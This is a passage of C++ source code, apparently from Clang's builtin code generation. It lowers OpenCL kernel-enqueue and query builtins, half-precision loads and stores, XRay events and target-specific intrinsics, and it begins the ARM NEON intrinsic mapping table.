EventRet = llvm::ConstantPointerNull::get(EventPtrTy);
} else {
EventRet =
Builder.CreatePointerCast(EmitScalarExpr(E->getArg(5)), EventPtrTy);
}
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(6));
llvm::Value *Kernel =
Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
llvm::Value *Block =
Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
std::vector<llvm::Type *> ArgTys = {
QueueTy, Int32Ty, RangeTy, Int32Ty,
EventPtrTy, EventPtrTy, GenericVoidPtrTy, GenericVoidPtrTy};
std::vector<llvm::Value *> Args = {Queue, Flags, Range,
NumEvents, EventWaitList, EventRet,
Kernel, Block};
if (NumArgs == 7) {
// Has events but no variadics.
Name = "__enqueue_kernel_basic_events";
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
return RValue::get(
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
llvm::ArrayRef<llvm::Value *>(Args)));
}
// Has event info and variadics
// Pass the number of variadics to the runtime function too.
Args.push_back(ConstantInt::get(Int32Ty, NumArgs - 7));
ArgTys.push_back(Int32Ty);
Name = "__enqueue_kernel_events_varargs";
llvm::Value *ElemPtr, *TmpSize, *TmpPtr;
std::tie(ElemPtr, TmpSize, TmpPtr) = CreateArrayForSizeVar(7);
Args.push_back(ElemPtr);
ArgTys.push_back(ElemPtr->getType());
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
auto Call =
RValue::get(EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
llvm::ArrayRef<llvm::Value *>(Args)));
if (TmpSize)
EmitLifetimeEnd(TmpSize, TmpPtr);
return Call;
}
LLVM_FALLTHROUGH;
}
// OpenCL v2.0 s6.13.17.6 - Kernel query functions need bitcast of block
// parameter.
case Builtin::BIget_kernel_work_group_size: {
llvm::Type *GenericVoidPtrTy = Builder.getInt8PtrTy(
getContext().getTargetAddressSpace(LangAS::opencl_generic));
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(0));
Value *Kernel = Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
Value *Arg = Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
return RValue::get(EmitRuntimeCall(
CGM.CreateRuntimeFunction(
llvm::FunctionType::get(IntTy, {GenericVoidPtrTy, GenericVoidPtrTy},
false),
"__get_kernel_work_group_size_impl"),
{Kernel, Arg}));
}
case Builtin::BIget_kernel_preferred_work_group_size_multiple: {
llvm::Type *GenericVoidPtrTy = Builder.getInt8PtrTy(
getContext().getTargetAddressSpace(LangAS::opencl_generic));
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(0));
Value *Kernel = Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
Value *Arg = Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
return RValue::get(EmitRuntimeCall(
CGM.CreateRuntimeFunction(
llvm::FunctionType::get(IntTy, {GenericVoidPtrTy, GenericVoidPtrTy},
false),
"__get_kernel_preferred_work_group_size_multiple_impl"),
{Kernel, Arg}));
}
case Builtin::BIget_kernel_max_sub_group_size_for_ndrange:
case Builtin::BIget_kernel_sub_group_count_for_ndrange: {
llvm::Type *GenericVoidPtrTy = Builder.getInt8PtrTy(
getContext().getTargetAddressSpace(LangAS::opencl_generic));
LValue NDRangeL = EmitAggExprToLValue(E->getArg(0));
llvm::Value *NDRange = NDRangeL.getAddress(*this).getPointer();
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(1));
Value *Kernel = Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
Value *Block = Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
const char *Name =
BuiltinID == Builtin::BIget_kernel_max_sub_group_size_for_ndrange
? "__get_kernel_max_sub_group_size_for_ndrange_impl"
: "__get_kernel_sub_group_count_for_ndrange_impl";
return RValue::get(EmitRuntimeCall(
CGM.CreateRuntimeFunction(
llvm::FunctionType::get(
IntTy, {NDRange->getType(), GenericVoidPtrTy, GenericVoidPtrTy},
false),
Name),
{NDRange, Kernel, Block}));
}
case Builtin::BI__builtin_store_half:
case Builtin::BI__builtin_store_halff: {
Value *Val = EmitScalarExpr(E->getArg(0));
Address Address = EmitPointerWithAlignment(E->getArg(1));
Value *HalfVal = Builder.CreateFPTrunc(Val, Builder.getHalfTy());
return RValue::get(Builder.CreateStore(HalfVal, Address));
}
case Builtin::BI__builtin_load_half: {
Address Address = EmitPointerWithAlignment(E->getArg(0));
Value *HalfVal = Builder.CreateLoad(Address);
return RValue::get(Builder.CreateFPExt(HalfVal, Builder.getDoubleTy()));
}
case Builtin::BI__builtin_load_halff: {
Address Address = EmitPointerWithAlignment(E->getArg(0));
Value *HalfVal = Builder.CreateLoad(Address);
return RValue::get(Builder.CreateFPExt(HalfVal, Builder.getFloatTy()));
}
case Builtin::BIprintf:
if (getTarget().getTriple().isNVPTX() ||
getTarget().getTriple().isAMDGCN()) {
if (getLangOpts().OpenMPIsDevice)
return EmitOpenMPDevicePrintfCallExpr(E);
if (getTarget().getTriple().isNVPTX())
return EmitNVPTXDevicePrintfCallExpr(E);
if (getTarget().getTriple().isAMDGCN() && getLangOpts().HIP)
return EmitAMDGPUDevicePrintfCallExpr(E);
}
break;
case Builtin::BI__builtin_canonicalize:
case Builtin::BI__builtin_canonicalizef:
case Builtin::BI__builtin_canonicalizef16:
case Builtin::BI__builtin_canonicalizel:
return RValue::get(emitUnaryBuiltin(*this, E, Intrinsic::canonicalize));
case Builtin::BI__builtin_thread_pointer: {
if (!getContext().getTargetInfo().isTLSSupported())
CGM.ErrorUnsupported(E, "__builtin_thread_pointer");
// Fall through - it's already mapped to the intrinsic by GCCBuiltin.
break;
}
case Builtin::BI__builtin_os_log_format:
return emitBuiltinOSLogFormat(*E);
case Builtin::BI__xray_customevent: {
if (!ShouldXRayInstrumentFunction())
return RValue::getIgnored();
if (!CGM.getCodeGenOpts().XRayInstrumentationBundle.has(
XRayInstrKind::Custom))
return RValue::getIgnored();
if (const auto *XRayAttr = CurFuncDecl->getAttr<XRayInstrumentAttr>())
if (XRayAttr->neverXRayInstrument() && !AlwaysEmitXRayCustomEvents())
return RValue::getIgnored();
Function *F = CGM.getIntrinsic(Intrinsic::xray_customevent);
auto FTy = F->getFunctionType();
auto Arg0 = E->getArg(0);
auto Arg0Val = EmitScalarExpr(Arg0);
auto Arg0Ty = Arg0->getType();
auto PTy0 = FTy->getParamType(0);
if (PTy0 != Arg0Val->getType()) {
if (Arg0Ty->isArrayType())
Arg0Val = EmitArrayToPointerDecay(Arg0).getPointer();
else
Arg0Val = Builder.CreatePointerCast(Arg0Val, PTy0);
}
auto Arg1 = EmitScalarExpr(E->getArg(1));
auto PTy1 = FTy->getParamType(1);
if (PTy1 != Arg1->getType())
Arg1 = Builder.CreateTruncOrBitCast(Arg1, PTy1);
return RValue::get(Builder.CreateCall(F, {Arg0Val, Arg1}));
}
case Builtin::BI__xray_typedevent: {
// TODO: There should be a way to always emit events even if the current
// function is not instrumented. Losing events in a stream can cripple
// a trace.
if (!ShouldXRayInstrumentFunction())
return RValue::getIgnored();
if (!CGM.getCodeGenOpts().XRayInstrumentationBundle.has(
XRayInstrKind::Typed))
return RValue::getIgnored();
if (const auto *XRayAttr = CurFuncDecl->getAttr<XRayInstrumentAttr>())
if (XRayAttr->neverXRayInstrument() && !AlwaysEmitXRayTypedEvents())
return RValue::getIgnored();
Function *F = CGM.getIntrinsic(Intrinsic::xray_typedevent);
auto FTy = F->getFunctionType();
auto Arg0 = EmitScalarExpr(E->getArg(0));
auto PTy0 = FTy->getParamType(0);
if (PTy0 != Arg0->getType())
Arg0 = Builder.CreateTruncOrBitCast(Arg0, PTy0);
auto Arg1 = E->getArg(1);
auto Arg1Val = EmitScalarExpr(Arg1);
auto Arg1Ty = Arg1->getType();
auto PTy1 = FTy->getParamType(1);
if (PTy1 != Arg1Val->getType()) {
if (Arg1Ty->isArrayType())
Arg1Val = EmitArrayToPointerDecay(Arg1).getPointer();
else
Arg1Val = Builder.CreatePointerCast(Arg1Val, PTy1);
}
auto Arg2 = EmitScalarExpr(E->getArg(2));
auto PTy2 = FTy->getParamType(2);
if (PTy2 != Arg2->getType())
Arg2 = Builder.CreateTruncOrBitCast(Arg2, PTy2);
return RValue::get(Builder.CreateCall(F, {Arg0, Arg1Val, Arg2}));
}
case Builtin::BI__builtin_ms_va_start:
case Builtin::BI__builtin_ms_va_end:
return RValue::get(
EmitVAStartEnd(EmitMSVAListRef(E->getArg(0)).getPointer(),
BuiltinID == Builtin::BI__builtin_ms_va_start));
case Builtin::BI__builtin_ms_va_copy: {
// Lower this manually. We can't reliably determine whether or not any
// given va_copy() is for a Win64 va_list from the calling convention
// alone, because it's legal to do this from a System V ABI function.
// With opaque pointer types, we won't have enough information in LLVM
// IR to determine this from the argument types, either. Best to do it
// now, while we have enough information.
Address DestAddr = EmitMSVAListRef(E->getArg(0));
Address SrcAddr = EmitMSVAListRef(E->getArg(1));
llvm::Type *BPP = Int8PtrPtrTy;
DestAddr = Address(Builder.CreateBitCast(DestAddr.getPointer(), BPP, "cp"),
DestAddr.getAlignment());
SrcAddr = Address(Builder.CreateBitCast(SrcAddr.getPointer(), BPP, "ap"),
SrcAddr.getAlignment());
Value *ArgPtr = Builder.CreateLoad(SrcAddr, "ap.val");
return RValue::get(Builder.CreateStore(ArgPtr, DestAddr));
}
// SYCL
case Builtin::BI__builtin_intel_fpga_reg:
return EmitIntelFPGARegBuiltin(E, ReturnValue);
case Builtin::BI__builtin_intel_fpga_mem:
return EmitIntelFPGAMemBuiltin(E);
case Builtin::BI__builtin_get_device_side_mangled_name: {
auto Name = CGM.getCUDARuntime().getDeviceSideName(
cast<DeclRefExpr>(E->getArg(0)->IgnoreImpCasts())->getDecl());
auto Str = CGM.GetAddrOfConstantCString(Name, "");
llvm::Constant *Zeros[] = {llvm::ConstantInt::get(SizeTy, 0),
llvm::ConstantInt::get(SizeTy, 0)};
auto *Ptr = llvm::ConstantExpr::getGetElementPtr(Str.getElementType(),
Str.getPointer(), Zeros);
return RValue::get(Ptr);
}
}
// If this is an alias for a lib function (e.g. __builtin_sin), emit
// the call using the normal call path, but using the unmangled
// version of the function name.
if (getContext().BuiltinInfo.isLibFunction(BuiltinID))
return emitLibraryCall(*this, FD, E,
CGM.getBuiltinLibFunction(FD, BuiltinID));
// If this is a predefined lib function (e.g. malloc), emit the call
// using exactly the normal call path.
if (getContext().BuiltinInfo.isPredefinedLibFunction(BuiltinID))
return emitLibraryCall(*this, FD, E,
cast<llvm::Constant>(EmitScalarExpr(E->getCallee())));
// Check that a call to a target specific builtin has the correct target
// features.
// This is down here to avoid non-target specific builtins, however, if
// generic builtins start to require generic target features then we
// can move this up to the beginning of the function.
checkTargetFeatures(E, FD);
if (unsigned VectorWidth = getContext().BuiltinInfo.getRequiredVectorWidth(BuiltinID))
LargestVectorWidth = std::max(LargestVectorWidth, VectorWidth);
// See if we have a target specific intrinsic.
const char *Name = getContext().BuiltinInfo.getName(BuiltinID);
Intrinsic::ID IntrinsicID = Intrinsic::not_intrinsic;
StringRef Prefix =
llvm::Triple::getArchTypePrefix(getTarget().getTriple().getArch());
if (!Prefix.empty()) {
IntrinsicID = Intrinsic::getIntrinsicForGCCBuiltin(Prefix.data(), Name);
// NOTE we don't need to perform a compatibility flag check here since the
// intrinsics are declared in Builtins*.def via LANGBUILTIN which filter the
// MS builtins via ALL_MS_LANGUAGES and are filtered earlier.
if (IntrinsicID == Intrinsic::not_intrinsic)
IntrinsicID = Intrinsic::getIntrinsicForMSBuiltin(Prefix.data(), Name);
}
if (IntrinsicID != Intrinsic::not_intrinsic) {
SmallVector<Value*, 16> Args;
// Find out if any arguments are required to be integer constant
// expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
Function *F = CGM.getIntrinsic(IntrinsicID);
llvm::FunctionType *FTy = F->getFunctionType();
for (unsigned i = 0, e = E->getNumArgs(); i != e; ++i) {
Value *ArgValue;
// If this is a normal argument, just emit it as a scalar.
if ((ICEArguments & (1 << i)) == 0) {
ArgValue = EmitScalarExpr(E->getArg(i));
} else {
// If this is required to be a constant, constant fold it so that we
// know that the generated intrinsic gets a ConstantInt.
ArgValue = llvm::ConstantInt::get(
getLLVMContext(),
*E->getArg(i)->getIntegerConstantExpr(getContext()));
}
// If the intrinsic arg type is different from the builtin arg type
// we need to do a bit cast.
llvm::Type *PTy = FTy->getParamType(i);
if (PTy != ArgValue->getType()) {
// XXX - vector of pointers?
if (auto *PtrTy = dyn_cast<llvm::PointerType>(PTy)) {
if (PtrTy->getAddressSpace() !=
ArgValue->getType()->getPointerAddressSpace()) {
ArgValue = Builder.CreateAddrSpaceCast(
ArgValue,
ArgValue->getType()->getPointerTo(PtrTy->getAddressSpace()));
}
}
assert(PTy->canLosslesslyBitCastTo(FTy->getParamType(i)) &&
"Must be able to losslessly bit cast to param");
ArgValue = Builder.CreateBitCast(ArgValue, PTy);
}
Args.push_back(ArgValue);
}
Value *V = Builder.CreateCall(F, Args);
QualType BuiltinRetType = E->getType();
llvm::Type *RetTy = VoidTy;
if (!BuiltinRetType->isVoidType())
RetTy = ConvertType(BuiltinRetType);
if (RetTy != V->getType()) {
// XXX - vector of pointers?
if (auto *PtrTy = dyn_cast<llvm::PointerType>(RetTy)) {
if (PtrTy->getAddressSpace() != V->getType()->getPointerAddressSpace()) {
V = Builder.CreateAddrSpaceCast(
V, V->getType()->getPointerTo(PtrTy->getAddressSpace()));
}
}
assert(V->getType()->canLosslesslyBitCastTo(RetTy) &&
"Must be able to losslessly bit cast result type");
V = Builder.CreateBitCast(V, RetTy);
}
return RValue::get(V);
}
// Some target-specific builtins can have aggregate return values, e.g.
// __builtin_arm_mve_vld2q_u32. So if the result is an aggregate, force
// ReturnValue to be non-null, so that the target-specific emission code can
// always just emit into it.
TypeEvaluationKind EvalKind = getEvaluationKind(E->getType());
if (EvalKind == TEK_Aggregate && ReturnValue.isNull()) {
Address DestPtr = CreateMemTemp(E->getType(), "agg.tmp");
ReturnValue = ReturnValueSlot(DestPtr, false);
}
// Now see if we can emit a target-specific builtin.
if (Value *V = EmitTargetBuiltinExpr(BuiltinID, E, ReturnValue)) {
switch (EvalKind) {
case TEK_Scalar:
return RValue::get(V);
case TEK_Aggregate:
return RValue::getAggregate(ReturnValue.getValue(),
ReturnValue.isVolatile());
case TEK_Complex:
llvm_unreachable("No current target builtin returns complex");
}
llvm_unreachable("Bad evaluation kind in EmitBuiltinExpr");
}
ErrorUnsupported(E, "builtin function");
// Unknown builtin, for now just dump it out and return undef.
return GetUndefRValue(E->getType());
}
static Value *EmitTargetArchBuiltinExpr(CodeGenFunction *CGF,
unsigned BuiltinID, const CallExpr *E,
ReturnValueSlot ReturnValue,
llvm::Triple::ArchType Arch) {
switch (Arch) {
case llvm::Triple::arm:
case llvm::Triple::armeb:
case llvm::Triple::thumb:
case llvm::Triple::thumbeb:
return CGF->EmitARMBuiltinExpr(BuiltinID, E, ReturnValue, Arch);
case llvm::Triple::aarch64:
case llvm::Triple::aarch64_32:
case llvm::Triple::aarch64_be:
return CGF->EmitAArch64BuiltinExpr(BuiltinID, E, Arch);
case llvm::Triple::bpfeb:
case llvm::Triple::bpfel:
return CGF->EmitBPFBuiltinExpr(BuiltinID, E);
case llvm::Triple::x86:
case llvm::Triple::x86_64:
return CGF->EmitX86BuiltinExpr(BuiltinID, E);
case llvm::Triple::ppc:
case llvm::Triple::ppcle:
case llvm::Triple::ppc64:
case llvm::Triple::ppc64le:
return CGF->EmitPPCBuiltinExpr(BuiltinID, E);
case llvm::Triple::r600:
case llvm::Triple::amdgcn:
return CGF->EmitAMDGPUBuiltinExpr(BuiltinID, E);
case llvm::Triple::systemz:
return CGF->EmitSystemZBuiltinExpr(BuiltinID, E);
case llvm::Triple::nvptx:
case llvm::Triple::nvptx64:
return CGF->EmitNVPTXBuiltinExpr(BuiltinID, E);
case llvm::Triple::wasm32:
case llvm::Triple::wasm64:
return CGF->EmitWebAssemblyBuiltinExpr(BuiltinID, E);
case llvm::Triple::hexagon:
return CGF->EmitHexagonBuiltinExpr(BuiltinID, E);
case llvm::Triple::riscv32:
case llvm::Triple::riscv64:
return CGF->EmitRISCVBuiltinExpr(BuiltinID, E, ReturnValue);
default:
return nullptr;
}
}
Value *CodeGenFunction::EmitTargetBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue) {
if (getContext().BuiltinInfo.isAuxBuiltinID(BuiltinID)) {
assert(getContext().getAuxTargetInfo() && "Missing aux target info");
return EmitTargetArchBuiltinExpr(
this, getContext().BuiltinInfo.getAuxBuiltinID(BuiltinID), E,
ReturnValue, getContext().getAuxTargetInfo()->getTriple().getArch());
}
return EmitTargetArchBuiltinExpr(this, BuiltinID, E, ReturnValue,
getTarget().getTriple().getArch());
}
static llvm::FixedVectorType *GetNeonType(CodeGenFunction *CGF,
NeonTypeFlags TypeFlags,
bool HasLegalHalfType = true,
bool V1Ty = false,
bool AllowBFloatArgsAndRet = true) {
int IsQuad = TypeFlags.isQuad();
switch (TypeFlags.getEltType()) {
case NeonTypeFlags::Int8:
case NeonTypeFlags::Poly8:
return llvm::FixedVectorType::get(CGF->Int8Ty, V1Ty ? 1 : (8 << IsQuad));
case NeonTypeFlags::Int16:
case NeonTypeFlags::Poly16:
return llvm::FixedVectorType::get(CGF->Int16Ty, V1Ty ? 1 : (4 << IsQuad));
case NeonTypeFlags::BFloat16:
if (AllowBFloatArgsAndRet)
return llvm::FixedVectorType::get(CGF->BFloatTy, V1Ty ? 1 : (4 << IsQuad));
else
return llvm::FixedVectorType::get(CGF->Int16Ty, V1Ty ? 1 : (4 << IsQuad));
case NeonTypeFlags::Float16:
if (HasLegalHalfType)
return llvm::FixedVectorType::get(CGF->HalfTy, V1Ty ? 1 : (4 << IsQuad));
else
return llvm::FixedVectorType::get(CGF->Int16Ty, V1Ty ? 1 : (4 << IsQuad));
case NeonTypeFlags::Int32:
return llvm::FixedVectorType::get(CGF->Int32Ty, V1Ty ? 1 : (2 << IsQuad));
case NeonTypeFlags::Int64:
case NeonTypeFlags::Poly64:
return llvm::FixedVectorType::get(CGF->Int64Ty, V1Ty ? 1 : (1 << IsQuad));
case NeonTypeFlags::Poly128:
// FIXME: i128 and f128 doesn't get fully support in Clang and llvm.
// There is a lot of i128 and f128 API missing.
// so we use v16i8 to represent poly128 and get pattern matched.
return llvm::FixedVectorType::get(CGF->Int8Ty, 16);
case NeonTypeFlags::Float32:
return llvm::FixedVectorType::get(CGF->FloatTy, V1Ty ? 1 : (2 << IsQuad));
case NeonTypeFlags::Float64:
return llvm::FixedVectorType::get(CGF->DoubleTy, V1Ty ? 1 : (1 << IsQuad));
}
llvm_unreachable("Unknown vector element type!");
}
static llvm::VectorType *GetFloatNeonType(CodeGenFunction *CGF,
NeonTypeFlags IntTypeFlags) {
int IsQuad = IntTypeFlags.isQuad();
switch (IntTypeFlags.getEltType()) {
case NeonTypeFlags::Int16:
return llvm::FixedVectorType::get(CGF->HalfTy, (4 << IsQuad));
case NeonTypeFlags::Int32:
return llvm::FixedVectorType::get(CGF->FloatTy, (2 << IsQuad));
case NeonTypeFlags::Int64:
return llvm::FixedVectorType::get(CGF->DoubleTy, (1 << IsQuad));
default:
llvm_unreachable("Type can't be converted to floating-point!");
}
}
Value *CodeGenFunction::EmitNeonSplat(Value *V, Constant *C,
const ElementCount &Count) {
Value *SV = llvm::ConstantVector::getSplat(Count, C);
return Builder.CreateShuffleVector(V, V, SV, "lane");
}
Value *CodeGenFunction::EmitNeonSplat(Value *V, Constant *C) {
ElementCount EC = cast<llvm::VectorType>(V->getType())->getElementCount();
return EmitNeonSplat(V, C, EC);
}
Value *CodeGenFunction::EmitNeonCall(Function *F, SmallVectorImpl<Value*> &Ops,
const char *name,
unsigned shift, bool rightshift) {
unsigned j = 0;
for (Function::const_arg_iterator ai = F->arg_begin(), ae = F->arg_end();
ai != ae; ++ai, ++j) {
if (F->isConstrainedFPIntrinsic())
if (ai->getType()->isMetadataTy())
continue;
if (shift > 0 && shift == j)
Ops[j] = EmitNeonShiftVector(Ops[j], ai->getType(), rightshift);
else
Ops[j] = Builder.CreateBitCast(Ops[j], ai->getType(), name);
}
if (F->isConstrainedFPIntrinsic())
return Builder.CreateConstrainedFPCall(F, Ops, name);
else
return Builder.CreateCall(F, Ops, name);
}
Value *CodeGenFunction::EmitNeonShiftVector(Value *V, llvm::Type *Ty,
bool neg) {
int SV = cast<ConstantInt>(V)->getSExtValue();
return ConstantInt::get(Ty, neg ? -SV : SV);
}
// Right-shift a vector by a constant.
Value *CodeGenFunction::EmitNeonRShiftImm(Value *Vec, Value *Shift,
llvm::Type *Ty, bool usgn,
const char *name) {
llvm::VectorType *VTy = cast<llvm::VectorType>(Ty);
int ShiftAmt = cast<ConstantInt>(Shift)->getSExtValue();
int EltSize = VTy->getScalarSizeInBits();
Vec = Builder.CreateBitCast(Vec, Ty);
// lshr/ashr are undefined when the shift amount is equal to the vector
// element size.
if (ShiftAmt == EltSize) {
if (usgn) {
// Right-shifting an unsigned value by its size yields 0.
return llvm::ConstantAggregateZero::get(VTy);
} else {
// Right-shifting a signed value by its size is equivalent
// to a shift of size-1.
--ShiftAmt;
Shift = ConstantInt::get(VTy->getElementType(), ShiftAmt);
}
}
Shift = EmitNeonShiftVector(Shift, Ty, false);
if (usgn)
return Builder.CreateLShr(Vec, Shift, name);
else
return Builder.CreateAShr(Vec, Shift, name);
}
enum {
AddRetType = (1 << 0),
Add1ArgType = (1 << 1),
Add2ArgTypes = (1 << 2),
VectorizeRetType = (1 << 3),
VectorizeArgTypes = (1 << 4),
InventFloatType = (1 << 5),
UnsignedAlts = (1 << 6),
Use64BitVectors = (1 << 7),
Use128BitVectors = (1 << 8),
Vectorize1ArgType = Add1ArgType | VectorizeArgTypes,
VectorRet = AddRetType | VectorizeRetType,
VectorRetGetArgs01 =
AddRetType | Add2ArgTypes | VectorizeRetType | VectorizeArgTypes,
FpCmpzModifiers =
AddRetType | VectorizeRetType | Add1ArgType | InventFloatType
};
namespace {
struct ARMVectorIntrinsicInfo {
const char *NameHint;
unsigned BuiltinID;
unsigned LLVMIntrinsic;
unsigned AltLLVMIntrinsic;
uint64_t TypeModifier;
bool operator<(unsigned RHSBuiltinID) const {
return BuiltinID < RHSBuiltinID;
}
bool operator<(const ARMVectorIntrinsicInfo &TE) const {
return BuiltinID < TE.BuiltinID;
}
};
} // end anonymous namespace
#define NEONMAP0(NameBase) \
{ #NameBase, NEON::BI__builtin_neon_ ## NameBase, 0, 0, 0 }
#define NEONMAP1(NameBase, LLVMIntrinsic, TypeModifier) \
{ #NameBase, NEON:: BI__builtin_neon_ ## NameBase, \
Intrinsic::LLVMIntrinsic, 0, TypeModifier }
#define NEONMAP2(NameBase, LLVMIntrinsic, AltLLVMIntrinsic, TypeModifier) \
{ #NameBase, NEON:: BI__builtin_neon_ ## NameBase, \
Intrinsic::LLVMIntrinsic, Intrinsic::AltLLVMIntrinsic, \
TypeModifier }
static const ARMVectorIntrinsicInfo ARMSIMDIntrinsicMap [] = {
NEONMAP1(__a32_vcvt_bf16_v, arm_neon_vcvtfp2bf, 0),
NEONMAP0(splat_lane_v),
NEONMAP0(splat_laneq_v),
NEONMAP0(splatq_lane_v),
NEONMAP0(splatq_laneq_v),
NEONMAP2(vabd_v, arm_neon_vabdu, arm_neon_vabds, Add1ArgType | UnsignedAlts),
NEONMAP2(vabdq_v, arm_neon_vabdu, arm_neon_vabds, Add1ArgType | UnsignedAlts),
NEONMAP1(vabs_v, arm_neon_vabs, 0),
NEONMAP1(vabsq_v, arm_neon_vabs, 0),
NEONMAP0(vadd_v),
NEONMAP0(vaddhn_v),
NEONMAP0(vaddq_v),
NEONMAP1(vaesdq_v, arm_neon_aesd, 0),
NEONMAP1(vaeseq_v, arm_neon_aese, 0),
NEONMAP1(vaesimcq_v, arm_neon_aesimc, 0),
NEONMAP1(vaesmcq_v, arm_neon_aesmc, 0),
NEONMAP1(vbfdot_v, arm_neon_bfdot, 0),
NEONMAP1(vbfdotq_v, arm_neon_bfdot, 0),
NEONMAP1(vbfmlalbq_v, arm_neon_bfmlalb, 0),
NEONMAP1(vbfmlaltq_v, arm_neon_bfmlalt, 0),
NEONMAP1(vbfmmlaq_v, arm_neon_bfmmla, 0),
NEONMAP1(vbsl_v, arm_neon_vbsl, AddRetType),
NEONMAP1(vbslq_v, arm_neon_vbsl, AddRetType),
NEONMAP1(vcadd_rot270_v, arm_neon_vcadd_rot270, Add1ArgType),
NEONMAP1(vcadd_rot90_v, arm_neon_vcadd_rot90, Add1ArgType),
NEONMAP1(vcaddq_rot270_v, arm_neon_vcadd_rot270, Add1ArgType),
NEONMAP1(vcaddq_rot90_v, arm_neon_vcadd_rot90, Add1ArgType),
NEONMAP1(vcage_v, arm_neon_vacge, 0),
NEONMAP1(vcageq_v, arm_neon_vacge, 0),
NEONMAP1(vcagt_v, arm_neon_vacgt, 0),
NEONMAP1(vcagtq_v, arm_neon_vacgt, 0),
NEONMAP1(vcale_v, arm_neon_vacge, 0),
NEONMAP1(vcaleq_v, arm_neon_vacge, 0),
NEONMAP1(vcalt_v, arm_neon_vacgt, 0),
NEONMAP1(vcaltq_v, arm_neon_vacgt, 0),
NEONMAP0(vceqz_v),
NEONMAP0(vceqzq_v),
NEONMAP0(vcgez_v),
NEONMAP0(vcgezq_v),
NEONMAP0(vcgtz_v),
NEONMAP0(vcgtzq_v),
NEONMAP0(vclez_v),
NEONMAP0(vclezq_v),
NEONMAP1(vcls_v, arm_neon_vcls, Add1ArgType),
NEONMAP1(vclsq_v, arm_neon_vcls, Add1ArgType),
NEONMAP0(vcltz_v),
NEONMAP0(vcltzq_v),
NEONMAP1(vclz_v, ctlz, Add1ArgType),
NEONMAP1(vclzq_v, ctlz, Add1ArgType),
NEONMAP1(vcnt_v, ctpop, Add1ArgType),
NEONMAP1(vcntq_v, ctpop, Add1ArgType),
NEONMAP1(vcvt_f16_f32, arm_neon_vcvtfp2hf, 0),
NEONMAP0(vcvt_f16_v),
NEONMAP1(vcvt_f32_f16, arm_neon_vcvthf2fp, 0),
NEONMAP0(vcvt_f32_v),
NEONMAP2(vcvt_n_f16_v, arm_neon_vcvtfxu2fp, arm_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvt_n_f32_v, arm_neon_vcvtfxu2fp, arm_neon_vcvtfxs2fp, 0),
NEONMAP1(vcvt_n_s16_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_s32_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_s64_v, arm_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_u16_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvt_n_u32_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvt_n_u64_v, arm_neon_vcvtfp2fxu, 0),
NEONMAP0(vcvt_s16_v),
NEONMAP0(vcvt_s32_v),
NEONMAP0(vcvt_s64_v),
NEONMAP0(vcvt_u16_v),
NEONMAP0(vcvt_u32_v),
NEONMAP0(vcvt_u64_v),
NEONMAP1(vcvta_s16_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvta_s32_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvta_s64_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvta_u16_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvta_u32_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvta_u64_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvtaq_s16_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvtaq_s32_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvtaq_s64_v, arm_neon_vcvtas, 0),
NEONMAP1(vcvtaq_u16_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvtaq_u32_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvtaq_u64_v, arm_neon_vcvtau, 0),
NEONMAP1(vcvth_bf16_f32, arm_neon_vcvtbfp2bf, 0),
NEONMAP1(vcvtm_s16_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtm_s32_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtm_s64_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtm_u16_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtm_u32_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtm_u64_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtmq_s16_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtmq_s32_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtmq_s64_v, arm_neon_vcvtms, 0),
NEONMAP1(vcvtmq_u16_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtmq_u32_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtmq_u64_v, arm_neon_vcvtmu, 0),
NEONMAP1(vcvtn_s16_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtn_s32_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtn_s64_v, arm_neon_vcvtns, 0),
NEONMAP1(vcvtn_u16_v, arm_neon_vcvtnu, 0),
